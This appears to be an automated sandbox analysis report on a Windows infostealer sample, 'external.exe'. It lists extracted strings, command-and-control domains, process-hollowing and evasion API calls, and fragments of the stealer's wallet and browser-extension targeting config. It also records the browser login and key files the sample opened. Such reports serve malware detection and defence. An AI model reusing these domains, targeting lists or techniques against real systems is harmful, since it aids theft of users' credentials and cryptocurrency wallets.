                Source: external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: external.exe, 00000002.00000003.1882863786.0000000003496000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: external.exe, 00000002.00000003.1725467175.0000000003535000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
                Source: external.exe, 00000002.00000003.1882590251.00000000035B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: external.exe, 00000002.00000003.1882590251.00000000035B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: external.exe, 00000002.00000003.1725467175.0000000003533000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1859687812.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1725562484.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1725695856.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1860192237.00000000034E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: external.exe, 00000002.00000003.1725562484.00000000034C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: external.exe, 00000002.00000003.1725467175.0000000003533000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1859687812.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1725562484.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1725695856.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1860192237.00000000034E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: external.exe, 00000002.00000003.1725562484.00000000034C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: external.exe, external.exe, 00000002.00000003.1935721640.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996417805.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1949098111.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1908135316.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1908263805.0000000000DF9000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996069207.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1986440657.0000000000DF9000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1932697450.0000000000DEF000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996281365.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1932578761.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1948722276.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1908103899.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wordyfindy.lat/
                Source: external.exe, 00000002.00000003.1986291293.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1949098111.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996069207.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996332941.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996069207.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1948722276.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wordyfindy.lat/api
                Source: external.exe, 00000002.00000002.1996332941.0000000000E02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wordyfindy.lat/api(WA
                Source: external.exe, 00000002.00000002.1996417805.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1949009593.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1948658180.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1948789926.0000000000E19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wordyfindy.lat/ff
                Source: external.exe, 00000002.00000002.1996069207.0000000000D62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wordyfindy.lat:443/api
                Source: external.exe, 00000002.00000002.1996069207.0000000000D62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wordyfindy.lat:443/apiion.txtPK
                Source: external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
                Source: external.exe, 00000002.00000003.1882863786.0000000003496000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: external.exe, 00000002.00000003.1882590251.00000000035B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: external.exe, 00000002.00000003.1882590251.00000000035B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: external.exe, 00000002.00000003.1882590251.00000000035B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: external.exe, 00000002.00000003.1882590251.00000000035B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: external.exe, 00000002.00000003.1882590251.00000000035B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknown HTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49740 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: C:\Users\user\Desktop\external.exe Code function: 2_2_00431A20 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt, 2_2_00431A20
                Source: C:\Users\user\Desktop\external.exe Code function: String function: 007066A0 appears 50 times
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRpcPing.exej% vs external.exe
                Source: external.exe, 00000000.00000000.1669393545.000000000077E000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameRpcPing.exej% vs external.exe
                Source: external.exe, 00000002.00000002.1995916583.000000000077E000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameRpcPing.exej% vs external.exe
                Source: external.exe, 00000002.00000003.1675488289.00000000027D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRpcPing.exej% vs external.exe
                Source: external.exe Binary or memory string: OriginalFilenameRpcPing.exej% vs external.exe
                Source: external.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: external.exe Static PE information: Section: .bss ZLIB complexity 1.0003301056338028
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/1@2/1
                Source: C:\Users\user\Desktop\external.exe Code function: 2_2_00435AC0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW, 2_2_00435AC0
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_03
                Source: external.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\external.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: external.exe, 00000002.00000003.1860056737.00000000034A8000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724920307.00000000034C6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: external.exe Virustotal: Detection: 37%
                Source: C:\Users\user\Desktop\external.exe File read: C:\Users\user\Desktop\external.exe
                Source: unknown Process created: C:\Users\user\Desktop\external.exe "C:\Users\user\Desktop\external.exe"
                Source: C:\Users\user\Desktop\external.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\external.exe Process created: C:\Users\user\Desktop\external.exe "C:\Users\user\Desktop\external.exe"
                Source: C:\Users\user\Desktop\external.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: webio.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\external.exe Section loaded: version.dll
                Source: external.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: external.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: external.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: external.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: external.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: external.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\external.exe Code function: 0_2_007067C3 push ecx; ret 0_2_007067D6
                Source: C:\Users\user\Desktop\external.exe Code function: 2_3_00DE8F4F push FFFFFFDBh; iretd 2_3_00DE8F60
                Source: C:\Users\user\Desktop\external.exe Code function: 2_3_00DE93CD push esi; retf 2_3_00DE93D0
                Source: C:\Users\user\Desktop\external.exe Code function: 2_3_00DECD07 pushfd ; ret 2_3_00DECD08
                Source: C:\Users\user\Desktop\external.exe Code function: 2_3_00DF5A5A push ecx; retf 2_3_00DF5A80
                Source: C:\Users\user\Desktop\external.exe Code function: 2_3_00DF78D6 push esi; retf 2_3_00DF78D8
                Source: C:\Users\user\Desktop\external.exe Code function: 2_3_00DFBE30 push eax; retf 2_3_00DFBEE5
                Source: C:\Users\user\Desktop\external.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\external.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\external.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\external.exe System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\external.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-21841
                Source: C:\Users\user\Desktop\external.exe TID: 6312 Thread sleep time: -150000s >= -30000s
                Source: C:\Users\user\Desktop\external.exe TID: 6312 Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\external.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\external.exe Code function: 0_2_00719126 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00719126
                Source: external.exe, 00000002.00000002.1996069207.0000000000D94000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWy
                Source: external.exe, 00000002.00000002.1996069207.0000000000D94000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: external.exe, 00000002.00000002.1996069207.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
                Source: C:\Users\user\Desktop\external.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\external.exe Code function: 2_2_00439E70 LdrInitializeThunk, 2_2_00439E70
                Source: C:\Users\user\Desktop\external.exe Code function: 0_2_0070F2B0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0070F2B0
                Source: C:\Users\user\Desktop\external.exe Code function: 0_2_0072F19E mov edi, dword ptr fs:[00000030h] 0_2_0072F19E
                Source: C:\Users\user\Desktop\external.exe Code function: 0_2_006F16C0 mov edi, dword ptr fs:[00000030h] 0_2_006F16C0
                Source: C:\Users\user\Desktop\external.exe Code function: 0_2_00714ABC GetProcessHeap, 0_2_00714ABC
                Source: C:\Users\user\Desktop\external.exe Code function: 0_2_0070616C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0070616C
                Source: C:\Users\user\Desktop\external.exe Code function: 0_2_00706528 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00706528
                Source: C:\Users\user\Desktop\external.exe Code function: 0_2_0070651C SetUnhandledExceptionFilter, 0_2_0070651C

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\external.exe | Code function: 0_2_0072F19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_0072F19E
                Source: C:\Users\user\Desktop\external.exe | Memory written: C:\Users\user\Desktop\external.exe base: 400000 value starts with: 4D5A
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: bashfulacid.lat
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: tentabatte.lat
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: curverpluch.lat
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: talkynicer.lat
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: shapestickyr.lat
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: manyrestro.lat
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: slipperyloo.lat
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: wordyfindy.lat
                Source: external.exe, 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: bellflamre.click
                Source: C:\Users\user\Desktop\external.exe | Process created: C:\Users\user\Desktop\external.exe "C:\Users\user\Desktop\external.exe"
                Source: C:\Users\user\Desktop\external.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_007183DF
                Source: C:\Users\user\Desktop\external.exe | Code function: EnumSystemLocalesW,0_2_007143A7
                Source: C:\Users\user\Desktop\external.exe | Code function: EnumSystemLocalesW,0_2_00718630
                Source: C:\Users\user\Desktop\external.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_007186CB
                Source: C:\Users\user\Desktop\external.exe | Code function: GetLocaleInfoW,0_2_0071897D
                Source: C:\Users\user\Desktop\external.exe | Code function: EnumSystemLocalesW,0_2_0071891E
                Source: C:\Users\user\Desktop\external.exe | Code function: EnumSystemLocalesW,0_2_00718A52
                Source: C:\Users\user\Desktop\external.exe | Code function: GetLocaleInfoW,0_2_00718A9D
                Source: C:\Users\user\Desktop\external.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00718B44
                Source: C:\Users\user\Desktop\external.exe | Code function: GetLocaleInfoW,0_2_00718C4A
                Source: C:\Users\user\Desktop\external.exe | Code function: GetLocaleInfoW,0_2_00713EAC
                Source: C:\Users\user\Desktop\external.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\external.exe | Code function: 0_2_00707110 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00707110
                Source: C:\Users\user\Desktop\external.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: external.exe, external.exe, 00000002.00000003.1935721640.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1932697450.0000000000DEF000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996863889.0000000003490000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1932578761.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\external.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: Process Memory Space: external.exe PID: 7140, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: external.exe | String found in binary or memory: erty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LT
                Source: external.exe | String found in binary or memory: ","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallet
                Source: external.exe | String found in binary or memory: nmhnfnkdnaad","ez":"Coinbase","ldb":true},{"en":"hpglfhgfnhbgpjdenjgmdgoeiappafln","ez":"Guarda"},{"en":"blnieiiffboillknjnepogjhkgnoapac","ez":"EQUA"},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":
                Source: external.exe | String found in binary or memory: oin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.li
                Source: external.exe | String found in binary or memory: locpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\
                Source: external.exe | String found in binary or memory: "Petra"},{"en":"opcgpfmipidbgpenhmajoajpbobppdil","ez":"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfoofkfgppdlbmlmnplgbn","ez":"Sub"},{"en":"mopnmbcafieddcagagdcbnhejhlodfdd","ez":"PolkadotJS"},{"en":"fijngjgcjhjmmpcmke
                Source: external.exe, 00000002.00000003.1908135316.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                Source: C:\Users\user\Desktop\external.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
